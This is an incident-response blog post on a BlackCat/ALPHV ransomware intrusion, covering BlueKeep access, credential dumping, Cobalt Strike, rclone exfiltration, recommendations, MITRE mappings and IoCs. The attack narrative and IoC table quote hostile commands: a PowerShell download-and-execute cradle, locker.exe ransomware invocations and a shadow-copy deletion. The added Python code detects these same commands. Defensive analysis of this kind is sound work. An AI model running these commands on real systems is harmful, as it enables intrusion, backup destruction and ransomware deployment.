The Black Cat’s Out of the Bag
Dark Lab responded to a lesser seen ransomware breed in Hong Kong attributable to ALPHV/BlackCat. We outline the tactics, techniques and procedures of the threat actor, and share our recommendations to ensure readers do not have a cat in hell’s chance of becoming the next victim.
In the second half of 2022, Dark Lab responded to an incident impacting a non-profit professional services organization in Hong Kong. Available evidence suggests that one of the affiliates of the cybercriminal group ALPHV, otherwise known as BlackCat Ransomware-as-a-Service (RaaS), was likely behind the incident.
Reports of BlackCat first emerged in mid-November 2021, and the RaaS group swiftly gained notoriety for their use of the unconventional programming language Rust, their flexibility to self-propagate and target multiple devices and operating systems, and a growing affiliate base with previous links to prolific threat activity groups including DarkSide/BlackMatter and Lockbit 2.0 RaaS programmes. The financially motivated cybercriminal group selects its targets opportunistically rather than with an intent to target specific sectors or geographies, but its leak site showed that, as of 31 August 2022, it had successfully targeted 136 organisations across the United States, Europe, and the Asia Pacific region.
BlackCat is a lesser seen ransomware breed in Hong Kong. However, we posit they may continue to target the region, due to their opportunistic nature and scalability through their affiliate network. In this blog, we will analyse Dark Lab’s recent encounter with BlackCat, their Tactics, Techniques, and Procedures (TTPs), and share insights and recommendations on how to detect and respond to prospective attacks.
Analysis and Exploitation in the wild
Based on the available audit logs, the threat actor likely leveraged a critical remote code execution vulnerability, CVE-2019-0708 or BlueKeep, in Remote Desktop Services – formerly known as Terminal Services – that affects selected older versions of Windows. To exploit this vulnerability, an unauthenticated attacker would need to send a specially crafted request to the target system’s Remote Desktop Service via Remote Desktop Protocol (RDP). An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system, including installing programs; viewing, changing, or deleting data; or creating new accounts with full user rights. It should be noted that the RDP service itself is not vulnerable.
Over the first three (3) days, three of five (3 of 5) potentially malicious IP addresses were observed gaining access to the vulnerable workstation in the victim environment, which was exposed to the Internet. The first two IP addresses logged in one day apart, and per various public sources have been flagged as potentially malicious dating back to December 2021. The time spent in the environment was observed to be minimal and no more than a couple of hours combined, with specific execution of the Advanced Port Scanner and Mimikatz observed in the second session. More details will be elaborated in the next section.
Meanwhile, the third IP address was not previously reported to be malicious. The time spent in the environment was increased to almost eight (8) hours, though based on the available audit logs we were unable to ascertain the actions of the threat actor. Notably, the threat actor then remained silent for slightly over one (1) week between the initial login from the third IP address and the subsequent login of the fourth IP address. A fifth IP address was also observed to have logged on to the vulnerable workstation thereafter.
While we are unable to attribute any of those five (5) IP addresses to specific threat actors, we hypothesize that there are two groups of threat actors – the first being an initial access broker as categorized by the first two IP addresses, and the second being the BlackCat affiliate as categorized by the remaining three IP addresses.
|Suspected Threat Actor||Country||Reported Malicious||Reported Malicious on OSINT Platforms||Day of Access||Time Spent in Environment|
|Initial Access Broker||Belize||Yes||April 2022||Day 1||5 mins|
|Initial Access Broker||Russia||Yes||June 2022||Day 2||1 hour|
|BlackCat Affiliate||Russia||No||–||Day 3||7 hours|
|BlackCat Affiliate||USA||No||–||Day 10||9 hours|
|BlackCat Affiliate||USA||No||–||Day 10||2 days 4 hours|
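A timeline like the one in the table above can be rebuilt from RDP session records. The following is an added example, not Dark Lab's tooling: the record format, the `CORP_NETS` range, the five-day quiet threshold and every address and date are constructed assumptions chosen to mirror the table's shape.

```python
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Assumption: the organisation's internal address ranges.
CORP_NETS = [ip_network("10.0.0.0/8")]

# Constructed RDP session records: (source IP, logon time, logoff time).
SESSIONS = [
    ("10.1.2.3",     "2022-01-01 09:00", "2022-01-01 17:00"),
    ("198.51.100.7", "2022-01-03 02:10", "2022-01-03 02:15"),
    ("203.0.113.9",  "2022-01-04 01:00", "2022-01-04 02:00"),
    ("192.0.2.44",   "2022-01-05 03:00", "2022-01-05 10:00"),
    ("192.0.2.80",   "2022-01-12 04:00", "2022-01-12 13:00"),
    ("192.0.2.81",   "2022-01-12 14:00", "2022-01-14 18:00"),
]

def external_timeline(sessions, quiet=timedelta(days=5)):
    """Summarise sessions whose source is outside CORP_NETS, in time order,
    marking any session that starts after a silence longer than `quiet`."""
    fmt = "%Y-%m-%d %H:%M"
    ext = sorted(
        (datetime.strptime(start, fmt), datetime.strptime(end, fmt), src)
        for src, start, end in sessions
        if not any(ip_address(src) in net for net in CORP_NETS)
    )
    rows, prev_end = [], None
    for start, end, src in ext:
        rows.append({
            "source": src,
            # Day 1 is the date of the first external logon.
            "day": (start.date() - ext[0][0].date()).days + 1,
            "duration": end - start,
            "after_quiet_period": prev_end is not None and start - prev_end > quiet,
        })
        # Track the latest logoff seen so overlapping sessions are handled.
        prev_end = end if prev_end is None else max(prev_end, end)
    return rows

if __name__ == "__main__":
    for row in external_timeline(SESSIONS):
        print(row)
```

A session flagged `after_quiet_period` is where a change of operator, such as the handover hypothesised above, is worth investigating.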
Through investigation into the compromised user account, we determined that the victim’s device was unknowingly exposed to the Internet due to a multi-homing issue: the device was connected to both the corporate network and a standalone network with an external firewall, and that standalone network’s configuration exposed the device to the Internet. It was further observed that the workstation had not been updated for multiple years, leaving the device unpatched and vulnerable to exploitation.
|First Published Date||26 November 2018|
|Affected Versions||Windows 7, Windows Server 2008 R2, Windows Server 2008 and earlier.|
|Description||A remote code execution vulnerability exists in Remote Desktop Services, formerly known as Terminal Services, when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka ‘Remote Desktop Services Remote Code Execution Vulnerability’.|
|Potential Impact||Remote Code Execution Vulnerability enables threat actors to gain initial access and execute the malicious code.|
|Proof of Concept (PoC) Available||Yes|
|Exploited in the Wild||Yes|
|Patch Available||Yes. Update to Windows Server 2012 or above.|
We highly recommend installing the latest Windows version for patches against additional unrelated vulnerabilities.
|Workaround Available||Microsoft has provided potential workarounds:|
• Disable Remote Desktop Services if they are not required.
• Enable Network Level Authentication (NLA) on systems running supported editions of the affected Windows versions.
• Block TCP port 3389 at the enterprise perimeter firewall.
Credential Access and Discovery by Suspected Initial Access Broker
We observed that the threat actor deployed Advanced Port Scanner to scan the network for open ports on network computers to identify weakened pathways.
The threat actor proceeded to execute Mimikatz to dump the Local Security Authority Subsystem Service (LSASS) process memory and obtain various credentials, including an account with domain administrator rights. This credential was later used for lateral movement.
Handover to Suspected BlackCat Affiliate for Further Discovery and Command & Control
It was observed that the threat actor executed a PowerShell command, Cobalt Strike BEACON (beacon.exe), to initiate a connection with their command-and-control (C2) server, establishing a foothold on the victim network. The C2 enabled remote access to the environment without RDP, as well as further infiltration by leveraging various features provided by the implant.
The threat actor established a connection to a Cobalt Strike Beacon hosted on a public cloud server, potentially to collect their various toolkits by executing this command:
powershell.exe -nop -w hidden -c IEX ((new-object.netclient).downloadstring("http:///a’)
Subsequently, the threat actor deployed AdFind.exe to perform active directory reconnaissance, enabling them to retrieve a list of accounts within the network.
BlackCat affiliates have been observed in the past to leverage AdFind.exe in conjunction with PowerShell to establish a persistent foothold on a target network, and thereafter download and execute malicious payloads. The fact that the threat actor did this only from the fourth and fifth IP addresses instead of the first three IP addresses lends more credence to our hypothesis that the first set of IP addresses belonged to an initial access broker.
Through their enumeration of the victim’s environment, the threat actor was able to identify the critical systems ideal for targeting, including the domain controller server, back-up servers, and the anti-virus management server. The threat actor identified that the anti-virus management server had no Endpoint Detection and Response (EDR) installed. Selective targeting of critical systems with no EDR coverage is a common practice among sophisticated threat actors, as such systems present an ideal environment for attackers to carry out their attack while stealthily evading detection.
After identifying the critical systems, the threat actor leveraged the stolen domain administrator account to initiate a remote desktop (RDP) connection. This enabled the threat actor to move laterally from the compromised multi-homed workstation to the targeted endpoints, because the network environment was flat as a result of basic or missing network segmentation.
It was observed that the threat actor exercised various acts of defense evasion through the use of masquerading tools and lateral movement. A key indicator tying this incident to BlackCat RaaS is the renaming of their tools, an evasive manoeuvre often used by BlackCat affiliates to hide their malicious tools and make the process appear as if it is the original Windows svchost process.
The threat actor proceeded to manually deploy the malware on the anti-virus management server, initiating the self-propagation process whilst deploying rclone.exe to exfiltrate the data to their cloud storage hosted on MEGACloud. Notably, while the New Zealand cloud service, MEGACloud, is a legitimate and trusted platform, it is also a popular service for hackers due to the platform’s unique payment feature allowing users to pay by Bitcoin.
It has been reported by security researchers that BlackCat affiliates leverage rclone.exe to collect and exfiltrate extensive amounts of data from their victim’s network. The threat actor executed the following command to exfiltrate data from the target network:
The threat actor exercised encryption of the exfiltrated data and executed locker.exe on various endpoints with the following commands:
"C:\Windows\locker.exe" --child --access-token --verbose
"C:\Windows\locker.exe" --access-token -v --no-prop-servers \ --propagated
The commands activate the BlackCat payload. The second command provides an indicator (“no-prop-servers”) that the malware has the capability to self-propagate, but the threat actor strategically targeted critical servers for propagation, omitting servers likely to detect their movements.
It is worth noting that self-propagation is not a common feature of ransomware. Ultimately, the goal of threat actors is to gain a foothold on a network as quickly as possible for exfiltration and extortion. Self-propagation can work against this need for speed, as it requires time in the resource development phase to enumerate the network and select targets, as well as a manual deployment of the attack. With that said, after the initial deployment the BlackCat ransomware is able to self-propagate, scaling across the network quickly – establishing their foothold whilst evading detection.
BlackCat affiliates work on behalf of the BlackCat group to conduct human-operated ransomware campaigns, opportunistic in nature. With a sophisticated toolkit and various evasion tactics, including the Rust-written malware and self-propagating features, BlackCat RaaS poses a significant threat to organisations with conventional security systems. Organisations are encouraged to review the TTPs leveraged by BlackCat affiliates, as observed in our recent incident response experience, to improve their preventative and detective controls.
As mentioned in the previous blog posts, defending against human-operated ransomware incidents is extremely challenging, but not impossible if organisations adopt a defense-in-depth approach. The following guiding principles should be observed, on top of those already listed in the previous blog post:
- Implement a robust threat and vulnerability management programme that leverages cyber threat intelligence to defend against human-operated ransomware incidents.
- Design, implement, and operate an enterprise security architecture that embeds the concept of zero trust to focus on protecting critical resources (assets, services, workflows, network accounts, etc.), and not specifically just for network segments, as the network location is no longer seen as the prime component to the security posture of the resource.
- Segment networks where operationally practical to prevent the spread of ransomware by controlling traffic flows between various subnetworks and by restricting adversary lateral movement. Disable unused administrative ports internally, such as Remote Desktop Protocol (RDP).
- Identify, detect, and investigate abnormal activity and potential traversal of the threat actor across the network, such as ensuring coverage of Endpoint Detection and Response (EDR) tools on critical endpoints, including workstations, laptops and servers.
- Monitor for malicious account and group policy creation to identify unauthorized changes and misconfigurations in your organisation’s network environment.
- Regularly review network and host-based assets for complete stock-taking to identify unpatched or misconfigured devices. Specifically, maintain an inventory of assets, with clear indication of the critical systems and sensitive data, mapped to business owners and the relevant security controls to manage cyber risk.
- Create a blacklist for the identified indicators of compromise (“IOC”) shared below to enable network-wide blocking and detection of attempted entry or attack and set up ongoing monitoring on the dark web and BlackCat leak site.
In addition, we strongly urge organisations that have deployed the vulnerable versions of Windows operating systems to execute the remediation actions outlined in the blog post, if not already completed.
MITRE ATT&CK TTPs Leveraged
We include the observed MITRE ATT&CK tactics and techniques elaborated from the incident.
- Active Scanning – T1595
- Gather Victim Identity Information: Credentials – T1589.001
- Credential Dumping – T1003
- Account Discovery: Domain Account – T1087.002
- Valid Accounts – T1078
- Domain Accounts – T1078.002
- Command and Scripting Interpreter – T1059
- External Remote Services – T1133
- Domain Trust Discovery – T1482
- Remote System Discovery – T1018
- Impair Defenses – T1562
- OS Credential Dumping – T1003
- File and Directory Discovery – T1083
- Network Service Discovery – T1046
- Network Share Discovery – T1135
- System Information Discovery – T1082
- Remote Access Software – T1219
- Data Encrypted for Impact – T1486
- Service Stop – T1489
- Web Service – T1102
- Lateral Tool Transfer – T1570
- Remote Services – T1021
- System Services: Service Execution – T1569.002
- Ingress Tool Transfer – T1105
- Remote Services: SMB/Windows Admin Shares – T1021.002
- Exfiltration Over Web Service: Exfiltration to Cloud Storage – T1567.002
- Transfer Data to Cloud Account – T1537
- Data Encrypted for Impact – T1486
Indicators of Compromise (IoCs)
|svchost.exe -connect ip:8443 -pass password||Process execution|
|powershell.exe -nop -w hidden -c IEX ((new-object.netclient).downloadstring("http[:]//ip[:]80/a"))||PowerShell execution|
|"C:\windows\system32\cmd.exe" /c "vssadmin.exe Delete Shadows /all /quiet"||Command Execution|
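The command-line indicators above, together with the locker.exe flags and the svchost masquerading described earlier, can be expressed as detection logic over process-creation events. This is an added example, not Dark Lab's tooling: the event tuples, rule names, 192.0.2.10, the token and the server name are constructed placeholders, and the svchost rule is a heuristic.

```python
import re

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

def detect(image, parent, cmd):
    """Return the names of the rules a process-creation event matches."""
    image, parent, cmd = image.lower(), parent.lower(), cmd.lower()
    name = image.rsplit("\\", 1)[-1]
    hits = []
    # Heuristic: genuine svchost.exe lives in a system directory, is started
    # by services.exe and carries a "-k <group>" argument.
    if name == "svchost.exe" and (
        not image.startswith(SYSTEM_DIRS)
        or not parent.endswith("\\services.exe")
        or not re.search(r"\s-k\s", cmd)
    ):
        hits.append("svchost_masquerade")
    # Hidden-window PowerShell that downloads and evaluates a remote script
    # (only the -w / -windowstyle spellings are covered here).
    if (name == "powershell.exe" and "iex" in cmd and "downloadstring" in cmd
            and re.search(r"-w(indowstyle)?\s+hidden", cmd)):
        hits.append("powershell_download_cradle")
    if "vssadmin" in cmd and re.search(r"delete\s+shadows", cmd):
        hits.append("shadow_copy_deletion")
    # Flag combination seen in the locker.exe command lines on this page.
    if "--access-token" in cmd and re.search(r"--(child|propagated|no-prop-servers)\b", cmd):
        hits.append("locker_flags")
    return hits

# Constructed events: (image path, parent image, command line).
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\services.exe",
     r"C:\Windows\System32\svchost.exe -k netsvcs -p"),
    (r"C:\Users\Public\svchost.exe", r"C:\Windows\System32\cmd.exe",
     r"svchost.exe -connect 192.0.2.10:8443 -pass EXAMPLE"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\cmd.exe",
     r"powershell.exe -nop -w hidden -c IEX ((new-object.netclient).downloadstring('http://192.0.2.10:80/a'))"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\cmd.exe",
     r'"C:\windows\system32\cmd.exe" /c "vssadmin.exe Delete Shadows /all /quiet"'),
    (r"C:\Windows\locker.exe", r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\locker.exe" --access-token EXAMPLE -v --no-prop-servers \\SRV-EXAMPLE --propagated'),
]

def scan(events):
    """Return {event index: [rule names]} for every event that matched."""
    return {i: h for i, e in enumerate(events) if (h := detect(*e))}

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(idx, rules)
```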
Feel free to contact us at [darklab dot cti at hk dot pwc dot com] for any further information.